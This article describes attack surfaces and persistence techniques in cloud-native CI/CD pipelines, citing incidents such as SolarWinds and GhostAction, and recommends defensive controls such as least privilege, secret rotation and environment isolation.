Where DevOps Pipelines Break: Real Attack Paths in Cloud-Native CI/CD
CI/CD pipelines sit at the center of how modern software is built and shipped. Source code, cryptographic keys, build artifacts and deployment credentials are all concentrated in a single automated flow, which makes these systems high-value targets.
Unlike a misconfigured S3 bucket or an unpatched container image, a compromised pipeline does not just expose data; it compromises the artifact itself. Every build produced after the breach can include attacker-controlled code, automatically and at scale.
The SolarWinds incident made this viscerally clear. Attackers didn’t breach the firewall. They waited inside the build system, modified source files immediately before compilation and let the resulting backdoored binary flow through normal software distribution channels. Microsoft, FireEye and dozens of government agencies received a backdoor through an update they trusted.
Most attacks don’t reach SolarWinds-level sophistication. However, the underlying principle is the same: Automated trust becomes the attack surface across most modern pipeline breaches.
Modern DevOps environments aren’t monolithic. They’re ecosystems of integrations: Code repositories, build servers, secret managers, artifact registries, deployment targets, monitoring stacks, notification webhooks and cloud APIs. Each connection is a trust relationship. Each trust relationship is a potential entry point.
DevOps tooling is designed to make integration frictionless. The friction reduction that speeds up deployment cycles also smoothens the path for lateral movement once something is compromised.
Security teams usually audit visible layers such as network perimeters, endpoint agents and access controls. Pipeline topology is harder to map and even harder to reason about from a threat perspective. A webhook that triggers a build job when a PR is merged looks mundane in isolation. Trace it through to its downstream permissions and it might have write access to a production Kubernetes namespace.
Six Primary Attack Surfaces in CI/CD Pipelines
1. Code Repositories
The repository is where pipeline control lives. .gitlab-ci.yml, Jenkinsfile and GitHub Actions workflows define execution logic and permissions. Write access to a repository, or a misconfigured pull_request_target workflow that accepts fork pull requests, can lead directly to code execution with access to repository secrets.
Attackers abuse this in two ways. First, direct modification: Alter a pipeline definition to exfiltrate secrets during the next build run. Second, dependency poisoning: Introduce a malicious package that the pipeline automatically pulls. The npm ecosystem has seen this. A phishing attack that compromised maintainer credentials for packages with billions of weekly downloads showed how a single account takeover can cascade through hundreds of dependent pipelines.
What makes repository attacks particularly dangerous in cloud-native environments is the blast radius. A GitHub Actions workflow with permissions to push container images, update Kubernetes manifests or rotate AWS credentials is an execution primitive with production-level reach.
2. Build Servers
Jenkins, GitLab CI and GitHub Actions runners execute arbitrary code by design. That’s the point. The security model depends entirely on controlling what gets executed and ensuring that the execution environment itself isn’t compromised.
Both assumptions break more often than expected. Outdated plugins are a chronic problem in self-hosted Jenkins installations; the CVE history for Jenkins plugins is long and unglamorous. Misconfigured agent permissions allow one pipeline to read secrets scoped to another. Shared build runners, especially in environments with weak isolation, allow a malicious job to observe or interfere with concurrent builds from other projects.
In Kubernetes-native CI environments, build pods with overly broad service account permissions create direct paths from a compromised build step to cluster-level operations. A pod with overly permissive RBAC can create other pods, modify ConfigMaps or access the Kubernetes API beyond its intended scope.
Attackers also abuse the execution model itself. Malicious dependencies can run automatically during installation before most pipeline controls or scanning stages apply. The Shai-Hulud npm worm followed this pattern, executing during dependency installation and using automated techniques to extract credentials from build environments. Since this code runs as part of the build process, it inherits the pipeline’s permissions and access, allowing it to propagate across CI/CD systems without requiring direct modification of repository code.
3. Secret Management
Secrets leak into pipelines through neglect, convenience and misconfiguration. Environment variables may appear in build logs when masking is misconfigured or bypassed — API keys are hardcoded in pipeline YAML and pushed to repositories; OAuth tokens with overly broad scope and no expiration; Docker registry credentials embedded in Kubernetes manifests and committed to version control.
The GhostAction campaign, documented by GitGuardian in 2025, illustrates the scale this can reach. Attackers distributed pull requests disguised as security improvements across GitHub repositories. Each PR contained a hidden workflow that, when merged, exfiltrated secrets via HTTP POST to an attacker-controlled endpoint. Over 327 GitHub users, 817 repositories and 3,325 secrets — including PyPI tokens, npm publish credentials and DockerHub authentication — were compromised through this pattern.
The attack succeeded not because of a zero-day exploit, but because secrets were accessible to workflow contexts that shouldn’t have needed them.
The cloud-native secret management stack has strong solutions for this: Kubernetes Secrets with encryption at rest enabled, HashiCorp Vault or AWS Secrets Manager for dynamic or short-lived credentials and IRSA or Workload Identity for cloud API access without long-lived static keys. The gap between having these tools available and using them consistently across pipelines is where most real-world exposures occur.
4. Deployment Environments
Artifacts built in CI must be deployed somewhere. That step often involves pushing container images or applying Kubernetes manifests and requires credentials and permissions that, if misconfigured, become prime targets.
The threat model here shifts from “can we compromise the build?” to “what happens if the artifact itself is malicious?” Insufficient image signing and verification means a compromised registry push can go undetected. Missing admission policies or image validation controls in Kubernetes clusters allow pods to run unverified or substituted images. Inadequate environment segmentation means a build that targets staging can, through misconfigured permissions, also reach production.
Attacks at this stage are particularly dangerous because they can bypass earlier quality controls and security scanning in the pipeline. An attacker who controls artifact delivery does not need to break past SAST scanners and can inject after them.
5. Monitoring and Logging Systems
Monitoring is the last place most teams think about as a target for attacks. It’s also where attackers go to cover their tracks and map infrastructure.
A compromised logging pipeline can weaken detection and complicate the investigation of malicious activity. Access to monitoring data can expose deployment schedules, service topology, environment variable usage patterns and operational rhythms that inform subsequent attacks. In Kubernetes environments, access to cluster metrics and pod logs can reveal insights into application behavior and secrets handling.
6. External Integrations and APIs
Every webhook, API key and cloud provider integration in a DevOps environment represents a trust boundary. Examples include Slack integrations that post deployment notifications, PagerDuty webhooks for incident creation, Datadog API keys for metrics ingestion and cloud provider credentials for infrastructure provisioning.
Most of these integrations receive more permissions than they need, because scoping down permissions requires effort and they are often configured under time pressure. In cloud-native architectures where dozens of services interact through APIs, the cumulative attack surface of under-scoped integrations is substantial.
Compromising a webhook endpoint or a cloud API key in this layer does not require touching source code or build infrastructure. It’s an indirect access path that often gets overlooked because it doesn’t resemble a traditional security boundary.
How Attackers Dig In After Initial Access
Getting initial access is one problem. Maintaining it without detection is another. In CI/CD environments, attackers use persistence techniques designed to survive routine security actions such as password rotations and repository audits.
Pipeline script modification is one of the most direct persistence paths. Altering a CI configuration file to add secret exfiltration, an outbound HTTP request or a malicious binary download allows the attack to execute with every build. If the change is subtle, for example, a single line in a large Jenkinsfile, it can persist for months without detection.
Environment variable hijacking targets credentials that exist only during a build run. These values do not appear in static code analysis. An attacker who can access build logs or inject a step that dumps environment variables can capture valid credentials without leaving persistent artifacts in the repository.
Malicious dependency injection operates on a longer timescale. By substituting or modifying a library that the pipeline automatically pulls, through a compromised package registry, cache poisoning or dependency confusion, attackers ensure that every build reintroduces the malicious code. Removing the initial access doesn’t resolve the issue if the compromised dependency remains in use.
Fake artifact publication extends the attack further. By publishing modified packages or container images to registries that other pipelines consume, attackers create a distribution path that operates through trusted channels. The initial breach becomes persistent supply chain contamination.
All of these persistence mechanisms share a common trait: They exploit the automated trust CI/CD systems depend on. Pipelines trust configuration, dependency resolvers trust registries and deployment systems trust artifacts. Without strong verification, attackers can operate within these trust paths indefinitely.
Practical Security Controls for CI/CD Pipelines
Below is a prioritized set of controls that address common weaknesses. Implementation should happen within a DevSecOps culture, where security is integrated at each pipeline stage and shared between development and security teams rather than added at the end.
1. Access Control and Privilege Scoping
Apply least privilege to every identity that interacts with the pipeline, including users, service accounts, build agents and deployment systems. CI/CD environments tend to accumulate permissions over time, so an agent that previously required broad access may still retain it. Regular audits of effective permissions help identify and remove this drift before it is exploited. Enforce MFA for repository access, centralize identity management where possible and monitor for anomalous activity such as off-hours secret access or unusual API usage.
2. Secret Life Cycle Management
Centralize secret storage in a dedicated system such as AWS Secrets Manager or Azure Key Vault. Enforce rotation and expiration. Mask secret values in logs and UI outputs. Use dynamic, short-lived credentials where supported, such as AWS IRSA, GCP Workload Identity Federation or Azure Managed Identity, instead of long-lived static keys. Isolate secret stores between environments so staging pipelines never have access to production credentials, even in read-only form.
3. Code and Dependency Verification
Integrate static analysis (SAST), dynamic testing (DAST), software composition analysis (SCA) and supply chain scanning directly into pipeline execution as blocking gates, not optional checks. Maintain a software bill of materials (SBOM) for every artifact. Verify package integrity using cryptographic hashes or signed packages where supported. Pin dependency versions and avoid resolving to latest in production builds.
4. Pipeline Observability and Anomaly Detection
Centralize logging across all pipeline components. Alert on anomalous patterns such as unexpected outbound network calls from build agents, secret access from unusual IP addresses, changes to workflow files in repositories that rarely modify CI configuration and artifact size changes without corresponding code updates. In Kubernetes environments, enable API server audit logging and monitor for potential privilege escalation.
5. Environment Isolation and Segmentation
Build, test, staging and production environments should be isolated at both the network and identity layers. Build agents should not have direct network access to production systems. Deployment credentials must be scoped to the target environment. In Kubernetes, use namespace-scoped service accounts, network policies and admission controllers such as Open Policy Agent or Kyverno to enforce these boundaries at the infrastructure level rather than relying on process discipline.
6. Security Automation in Pipelines
Security checks should run automatically on every pipeline execution without manual triggers. Run SAST on every pull request, SCA on each dependency update, container image scanning before every registry push and Kubernetes manifest validation before deployment. The goal is to make the secure path the default, so software engineers are not forced to choose between speed and safety.
7. Team Training Based on Real Attack Patterns
Security training that focuses only on phishing and password hygiene does not prepare developers for the threats their pipelines face. Scenarios such as npm token theft, malicious pull request abuse like GitHub Actions workflow injection attack and environment variable exfiltration are patterns developers need to recognize. Training should be concrete, technical and aligned with the tools and workflows the team actually uses.
Final Thoughts: The Core Challenge
Attacker interest in CI/CD infrastructure is driven by exceptional return on investment. Control over a build pipeline means control over everything downstream, including source code, credentials, infrastructure and ultimately the software that users trust.
The challenge is not a lack of tooling. The controls described above are achievable with existing technology. The harder problem is ensuring sustained ownership across a boundary that many organizations still treat as belonging to neither security nor development teams.
DevSecOps addresses this by making security a shared property of the pipeline rather than an external gate. Embedding verification at each stage, enforcing policy violations as build failures and treating the pipeline as an attack surface to be hardened shifts organizations from reactive response to structural resilience.
The pipelines that deliver production software require the same level of security rigor as the software itself. In practice, they often receive far less.


